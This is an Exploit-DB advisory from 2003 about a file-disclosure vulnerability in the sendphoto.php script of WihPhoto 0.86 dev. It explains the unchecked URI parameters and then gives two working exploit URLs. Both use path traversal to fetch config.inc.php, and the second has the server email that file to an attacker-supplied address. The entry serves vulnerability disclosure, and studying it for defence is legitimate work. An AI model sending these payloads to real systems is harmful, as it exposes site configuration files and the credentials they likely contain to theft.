WihPhoto 0.86 dev - 'sendphoto.php' File Disclosure

EDB-ID:

22282


Author:

frog

Type:

webapps


Platform:

PHP

Date:

2003-02-24


source: https://www.securityfocus.com/bid/6929/info

A vulnerability has been reported for WihPhoto that may result in the disclosure of files to remote attackers.

The vulnerability exists due to inadequate verification of some URI parameters in the sendphoto.php script file.

An attacker can exploit this vulnerability and specify arbitrary files as the parameters to the variables. This will cause WihPhoto to send an email with the attacker-specified file as an attachment. 


http://www.example.org/sendphoto.php?album=..&pic=config.inc.php
http://www.example.org/sendphoto.php?album=..&pic=config.inc.php&sendto=[E-MAIL]&filled=1